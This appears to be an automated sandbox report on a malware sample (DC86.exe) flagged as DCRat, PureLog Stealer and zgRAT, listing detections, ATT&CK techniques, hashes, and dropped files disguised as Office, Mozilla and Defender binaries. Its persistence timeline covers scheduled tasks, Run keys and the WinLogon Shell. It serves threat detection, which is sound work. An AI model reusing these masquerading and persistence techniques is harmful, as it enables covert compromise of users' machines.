Source: Yara match	File source: 5.0.hyperProviderbrokermonitorNet.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.DC86.exe.7535701.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.DC86.exe.6c2a701.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000005.00000002.2319266485.00000000129EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hyperProviderbrokermonitorNet.exe PID: 1416, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: DC86.exe, type: SAMPLE
Source: Yara match	File source: 0.3.DC86.exe.6c2a701.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.DC86.exe.7535701.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.hyperProviderbrokermonitorNet.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.DC86.exe.7535701.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.DC86.exe.6c2a701.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2110245096.00000000074E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2240119173.0000000000412000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2109455110.0000000006BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: DC86.exe, type: SAMPLE
Source: Yara match	File source: 0.3.DC86.exe.6c2a701.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.DC86.exe.7535701.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.hyperProviderbrokermonitorNet.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.DC86.exe.7535701.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.DC86.exe.6c2a701.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	142 Masquerading	OS Credential Dumping	1 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	11 Scripting	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	37 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 File Deletion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DC86.exe	56%	Virustotal		Browse
DC86.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
DC86.exe	100%	Avira	VBS/Runner.VPG
DC86.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\Desktop\oOURfLEr.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\zSWmQQDs.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\JWcAfTbAe8.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\iLGHwdYd.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\sBmPHITf.log	100%	Avira	TR/AD.BitpyRansom.lcksd
C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\LNOVbeou.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\XXbRMRdv.log	100%	Avira	TR/AD.BitpyRansom.lcksd
C:\Users\user\Desktop\oOURfLEr.log	100%	Joe Sandbox ML
C:\Windows\System32\SecurityHealthSystray.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\zSWmQQDs.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\RGruEKtj.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\gBkGwLsc.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\GQKmsfxg.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\BfvFrBjN.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\Windows Defender\en-GB\PuhmblZdAcSNmlRDfzjrgW.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\PuhmblZdAcSNmlRDfzjrgW.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\BfvFrBjN.log	9%	ReversingLabs
C:\Users\user\Desktop\GQKmsfxg.log	8%	ReversingLabs
C:\Users\user\Desktop\LNOVbeou.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\PdatkTco.log	25%	ReversingLabs
C:\Users\user\Desktop\PuTbcYNO.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\RGruEKtj.log	8%	ReversingLabs
C:\Users\user\Desktop\XXbRMRdv.log	33%	ReversingLabs	Win32.Ransomware.Bitpy
C:\Users\user\Desktop\ZkzjoDJQ.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\gBkGwLsc.log	9%	ReversingLabs
C:\Users\user\Desktop\iLGHwdYd.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\oOURfLEr.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\oncOKnjP.log	25%	ReversingLabs
C:\Users\user\Desktop\sBmPHITf.log	33%	ReversingLabs	Win32.Ransomware.Bitpy
C:\Users\user\Desktop\zSWmQQDs.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label	Link
http://go.mich	0%	Avira URL Cloud	safe

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	hyperProviderbrokermonitorNet.exe, 00000005.00000002.2314945218.0000000002B69000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.mich	hyperProviderbrokermonitorNet.exe, 00000027.00000002.2429370078.0000000001015000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589194
Start date and time:	2025-01-11 16:22:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	48
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DC86.exe
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winEXE@53/45@0/0
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 62% Number of executed functions: 370 Number of non-executed functions: 94
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, consent.exe, SIHClient.exe, schtasks.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50, 184.28.90.27
Excluded domains from analysis (whitelisted): 480344cm.renyash.ru, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target WmiPrvSE.exe, PID 4080 because it is empty
Execution Graph export aborted for target hyperProviderbrokermonitorNet.exe, PID 1416 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:22:46	Task Scheduler	Run new task: {AF5FC5F1-A5A7-45EC-8FEF-6A1FB9FD8E6C} path:
16:23:14	Task Scheduler	Run new task: PuhmblZdAcSNmlRDfzjrgWP path: "C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe"
16:23:14	Task Scheduler	Run new task: WmiPrvSE path: "C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe"
16:23:14	Task Scheduler	Run new task: WmiPrvSEW path: "C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe"
16:23:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe"
16:23:16	Task Scheduler	Run new task: hyperProviderbrokermonitorNet path: "C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe"
16:23:16	Task Scheduler	Run new task: hyperProviderbrokermonitorNeth path: "C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe"
16:23:16	Task Scheduler	Run new task: PuhmblZdAcSNmlRDfzjrgW path: "C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe"
16:23:23	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PuhmblZdAcSNmlRDfzjrgW "C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe"
16:23:31	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run hyperProviderbrokermonitorNet "C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe"
16:23:39	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe"
16:23:47	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PuhmblZdAcSNmlRDfzjrgW "C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe"
16:23:56	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run hyperProviderbrokermonitorNet "C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe"
16:24:04	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe"
16:24:12	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run PuhmblZdAcSNmlRDfzjrgW "C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe"
16:24:20	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run hyperProviderbrokermonitorNet "C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe"
16:24:36	Autostart	Run: WinLogon Shell "C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe"
16:24:44	Autostart	Run: WinLogon Shell "C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe"
16:24:52	Autostart	Run: WinLogon Shell "C:\Program Files (x86)\windows defender\en-GB\PuhmblZdAcSNmlRDfzjrgW.exe"
16:25:00	Autostart	Run: WinLogon Shell "C:\Recovery\PuhmblZdAcSNmlRDfzjrgW.exe"

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\BfvFrBjN.log	WinPerfcommon.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	hz7DzW2Yop.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	3XtEci4Mmo.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	lEwK4xROgV.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	zZ1Y43bxxV.exe	Get hash	malicious	DCRat	Browse
	updIMdPUj8.exe	Get hash	malicious	DCRat	Browse
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	QH67JSdZWl.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files (x86)\Microsoft Office\Office16\9292bed4859cea

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	ASCII text, with very long lines (545), with no line terminators
Category:	dropped
Size (bytes):	545
Entropy (8bit):	5.871783608298915
Encrypted:	false
SSDEEP:	12:6oReHrOh9x55/f+i9pxDBxcMuvPFbSumF5PM2V+JoSw49I3jAaERAqLBTl50:NSOh9xD+i9pxRuXAH1pcJA3jbER/thG
MD5:	CE389DCD8F69F7045328BA71CEE08EEA
SHA1:	0CD12643DF5AC7FF92152109C360BB2233FCC62A
SHA-256:	53B1AC437F9E04361103BCA0C1EE68442914364957FACDDCED26D3202F76009D
SHA-512:	9688DB368761CE2E6A942B525F3F4D737A8AD3384C02206087AB1CEC2B29DFF051C9E8C2A70B54DF26DB9B89F90E2836DD6EFB453110DEF8012DA3D1B269870B
Malicious:	false
Preview:	taxhOwEimqbcWWU41tnDrQ1CrLWO0ejSvO2pz0bX2R5Ywsy3jgEliQ0dju0Da0sHGIrHeoEARQLaUcQ8XdoUZ8ueYYGEAY7CiyRnBqZ5bEURFZJGe1p7LYrHYNsFiAA2TI1fLm7qEt2VncY8P9kIsA0KGJPy7TWaDc87in51392cfWd6yu0ja1JTRrYBXJsuWcRLdbalDsOtHYoupS9NdwAMTpp0O4duRIFDEScXTPgrmZM3CoVEKeRkbF2ywjWJPec8TlqX0l4NQTj3dvxkiZkw1fl8Zolt2XbI7Nkb78OikDUHg9VAwvk04pHy9r7M9KV21b5PLWmkKCMyKdcaTl7GwlORGwcQACiZrbQFDFzaJAp2dTnfOh3YNOFPMnJY3WjIdxGtNXWNwh7w6WywJ7BdJJLdVA2Z5agwahYqN3R1KpmqQTT0zWP6VG9TlmYNf7RVALWZ7IjPpJSdhfMBqBkjKjbThEEkeEVNYQpF742qw9RLxfwFaWgdWsLbtC12D9vkyFFQ0GEvI3wKSPfCS9KHh10pFOV4D

C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2023936
Entropy (8bit):	7.569672649447316
Encrypted:	false
SSDEEP:	49152:gWLMtwyMxRizAwgueOJNN3lRHiKLWDWU:gLwyMb9ue0NTH2P
MD5:	54EFF01605DA5E7CBDB382C98ECE2C2A
SHA1:	BE2ECFC24603A5E282BDFBB7780A03C1410879B8
SHA-256:	26BDA6E083DB3A3C3CCAF29434850D91BBB9E10C48886A6F6A06BBF6C183448D
SHA-512:	DD00705FB9741C6400145E2433AF42605264A95E4C1FE44EE1579AC464463F9B493D8BDEF98AF4A5B03D717CD79357674CC09E5B8780C4FFE31A9704B08C89D0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]g................................. ........@.. .......................@............@.................................p...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H...........X...........................................................0..........(.... ........8........E....).......N...M...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E........M...)...........}...8....~....:.... ....8.......... ....8....8.... ....~....{....:....& ....8........~....(W...~....([... ....<Y... ........8b...~....(O... .... .... ....s....~....(S....... ....~....{....:&...& ....8.

C:\Program Files (x86)\Microsoft\Edge\Application\CSC54DAB3F1F89841D48E3F80BA35A395CE.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1168
Entropy (8bit):	4.448520842480604
Encrypted:	false
SSDEEP:	24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
MD5:	B5189FB271BE514BEC128E0D0809C04E
SHA1:	5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
SHA-256:	E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
SHA-512:	F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
Malicious:	false
Preview:	.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.9383270220691404
Encrypted:	false
SSDEEP:	48:63mttVxZ8RxeOAkFJOcV4MKe28dedr4vqBHHuulB+hnqXSfbNtm:zKxvxVx9i4vk5TkZzNt
MD5:	CDC2FC1465F9D21587E8BA85C3B7764D
SHA1:	F82A92B205105B359CBABF15EB5D03410F64A702
SHA-256:	A5F354D8CE41D3F8439A3BDF40670CAAF4752FC2FF6F44AFBDECA463C802089F
SHA-512:	88A4915A091A622EE9EF22F5548F18E71ECE58B687B7621ECA32D03572749E33355D3D9CBC9A5F8FFBD60534B60C89705E0BC4694A6DE212A48520840AAF6EA0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=..g.............................'... ...@....@.. ....................................@..................................'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..\.............................................................(.....0..!.......r...pr...p.{....(....(....&..&......................0..........r...p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.,.......#GUID...<... ...#Blob...........WU........%3................................................................

C:\Program Files (x86)\Mozilla Maintenance Service\logs\24dbde2999530e

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	ASCII text, with very long lines (323), with no line terminators
Category:	dropped
Size (bytes):	323
Entropy (8bit):	5.828775630417745
Encrypted:	false
SSDEEP:	6:DThCFZvYD8hi/f3ehW9KuIjlkqpU7UdNh9X:DThIZvYwhi/PauKuIj60Ueb9X
MD5:	CD0362168E4BF6B9CE2BF58020B96461
SHA1:	CF1C6CF7C8C21D61FB337D92846D15A1F6F90A54
SHA-256:	B0EC1A881923F32010EB7BA2A8CE83451B9B070A80A9536CE085E23BED33BD76
SHA-512:	34A53BE903D9BD87179EF76135B4FA8B922E064504EF81B0AAA40F9592512355D795E4E18C2C2D6FCAED484829874F30D6134A8051568AC83A9F9676B7352660
Malicious:	false
Preview:	SuVd5AIegykEznC6PZLmuKsIR96m1xmwu0zxgWuFF1YOZi7lnbcAUmjHCMM5EgmsMyT8xPZ2oFg3vdtsCU8aVmbIRruUKzAjOpCkP8xYCjVOFpWicd3thMXjWKrFeErzF7oGbIdDgkYvQMDlVM2r5RCCRcNERs372fJIBPHTA0M7xmSKHFtSMA3x4ly84Yvyqa2vC4jFEiqFEEOoJD6L8lv1lVNabJYlEXRXthHNgoOnTys0WJy1ck0FpAJqrJo4JEBrx14l6tpUWHixnWERUhJdhMrtYagX9TdOxBDeOM5t5fsicWDUFWkm5hJlKLNfMSU

C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2023936
Entropy (8bit):	7.569672649447316
Encrypted:	false
SSDEEP:	49152:gWLMtwyMxRizAwgueOJNN3lRHiKLWDWU:gLwyMb9ue0NTH2P
MD5:	54EFF01605DA5E7CBDB382C98ECE2C2A
SHA1:	BE2ECFC24603A5E282BDFBB7780A03C1410879B8
SHA-256:	26BDA6E083DB3A3C3CCAF29434850D91BBB9E10C48886A6F6A06BBF6C183448D
SHA-512:	DD00705FB9741C6400145E2433AF42605264A95E4C1FE44EE1579AC464463F9B493D8BDEF98AF4A5B03D717CD79357674CC09E5B8780C4FFE31A9704B08C89D0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
